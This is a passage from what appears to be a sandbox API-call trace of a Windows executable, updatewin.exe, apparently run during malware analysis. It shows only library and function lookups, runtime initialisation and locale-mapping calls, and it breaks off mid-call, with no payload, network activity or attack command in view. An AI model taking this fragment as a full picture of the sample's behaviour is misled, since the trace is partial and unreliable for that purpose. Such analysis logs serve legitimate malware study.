lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeSListHead") returned 0x771694a4 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0045.117] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryExW") returned 0x76c3495d [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleExW") returned 0x76c34a6f [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0045.118] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0045.119] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0045.119] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0045.119] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileExW") returned 0x76c41811 [0045.119] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0045.119] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="GetDesktopWindow") returned 0x74f60a19 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="InvalidateRect") returned 0x74f61381 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="DrawIcon") returned 0x74f68deb [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="FillRect") returned 0x74f60eb6 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageW") returned 0x74f59679 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="GetDlgItem") returned 0x74f7f1ba [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="PostQuitMessage") returned 0x74f59abb [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="EndPaint") returned 0x74f61341 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="BeginPaint") returned 0x74f61361 [0045.119] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcW") returned 0x771625dd [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="DestroyWindow") returned 0x74f59a55 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="DialogBoxParamW") returned 0x74f7cfca [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="MoveWindow") returned 0x74f63698 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="GetClientRect") returned 0x74f60c62 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="CreateDialogParamW") returned 0x74f810dc [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="UpdateWindow") returned 0x74f63559 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="ShowWindow") returned 0x74f60dfb [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowPos") returned 0x74f58e4e [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="CreateWindowExW") returned 0x74f58a29 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="RegisterClassExW") returned 0x74f5b17d [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="LoadCursorW") returned 0x74f588f7 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="DispatchMessageW") returned 0x74f5787b [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="TranslateMessage") returned 0x74f57809 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="TranslateAcceleratorW") returned 0x74f61246 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="GetMessageW") returned 0x74f578e2 [0045.120] GetProcAddress (hModule=0x74f40000, lpProcName="LoadAcceleratorsW") returned 0x74f64dd6 [0045.121] GetProcAddress (hModule=0x74f40000, lpProcName="LoadStringW") returned 0x74f58eb9 [0045.121] GetProcAddress (hModule=0x74f40000, lpProcName="LoadIconW") returned 0x74f5b142 [0045.121] GetProcAddress (hModule=0x74f40000, lpProcName="GetMonitorInfoW") returned 0x74f63000 [0045.121] GetProcAddress (hModule=0x74f40000, lpProcName="MonitorFromWindow") returned 0x74f63150 [0045.121] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0045.121] GetProcAddress (hModule=0x75ad0000, lpProcName="TextOutW") returned 0x75aed41c [0045.121] GetProcAddress (hModule=0x75ad0000, lpProcName="SetBkMode") returned 0x75ae51a2 [0045.121] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0045.418] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateFontW") returned 0x75aeb600 [0045.418] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0045.418] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateSolidBrush") returned 0x75ae4f17 [0045.418] GetProcAddress (hModule=0x75ad0000, lpProcName="SetTextAlign") returned 0x75ae8401 [0045.418] LoadLibraryA (lpLibFileName="COMCTL32.dll") returned 0x74820000 [0045.421] GetProcAddress (hModule=0x74820000, lpProcName="InitCommonControlsEx") returned 0x748409ce [0045.421] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x74af0000 [0045.422] GetProcAddress (hModule=0x74af0000, lpProcName="timeGetTime") returned 0x74af26e0 [0045.422] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749c0000 [0045.425] GetProcAddress (hModule=0x749c0000, lpProcName="atexit") returned 0x749dc544 [0045.425] atexit (param_1=0x4f63c8) returned 0 [0045.425] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e5ac | out: lpSystemTimeAsFileTime=0x18e5ac*(dwLowDateTime=0x196eafb0, dwHighDateTime=0x1d5956a)) [0045.425] GetCurrentThreadId () returned 0xa04 [0045.425] GetCurrentProcessId () returned 0xa00 [0045.426] QueryPerformanceCounter (in: lpPerformanceCount=0x18e5a4 | out: lpPerformanceCount=0x18e5a4*=16559489498) returned 1 [0045.432] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0045.432] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.432] GetLastError () returned 0x57 [0045.433] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.433] GetLastError () returned 0x57 [0045.433] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0045.433] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0045.433] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.433] GetLastError () returned 0x57 [0045.433] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0045.433] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0045.435] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.435] GetLastError () returned 0x57 [0045.435] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.435] GetLastError () returned 0x57 [0045.435] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0045.435] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionEx") returned 0x76c34d28 [0045.435] GetProcessHeap () returned 0x4e0000 [0045.435] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.435] GetLastError () returned 0x57 [0045.435] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0045.435] GetLastError () returned 0x57 [0045.435] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0045.435] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x364) returned 0x50b9c0 [0045.435] SetLastError (dwErrCode=0x57) [0045.436] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xc00) returned 0x50bd30 [0045.437] GetStartupInfoW (in: lpStartupInfo=0x18e4e0 | out: lpStartupInfo=0x18e4e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x402400, hStdOutput=0xc3e73d1b, hStdError=0xfffffffe)) [0045.437] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0045.437] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0045.437] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0045.437] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe\" " [0045.437] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe\" " [0045.437] IsValidCodePage (CodePage=0x4e4) returned 1 [0045.437] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e500 | out: lpCPInfo=0x18e500) returned 1 [0045.437] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ddc8 | out: lpCPInfo=0x18ddc8) returned 1 [0045.437] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.437] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.437] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18dddc | out: lpCharType=0x18dddc) returned 1 [0045.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā") returned 256 [0045.438] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0045.438] GetLastError () returned 0x57 [0045.438] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1 [0045.438] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.438] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ謇@Ā", cchSrc=256, lpDestStr=0x18d908, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0045.438] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18e2dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿSú¾Ã\x18å\x18", lpUsedDefaultChar=0x0) returned 256 [0045.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0045.438] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18e3dc, cbMultiByte=256, lpWideCharStr=0x18db38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0045.438] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0045.438] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18d928, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0045.438] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18e1dc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿSú¾Ã\x18å\x18", lpUsedDefaultChar=0x0) returned 256 [0045.438] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x80) returned 0x50b0e0 [0045.438] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x413ba8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\updatewin.exe" 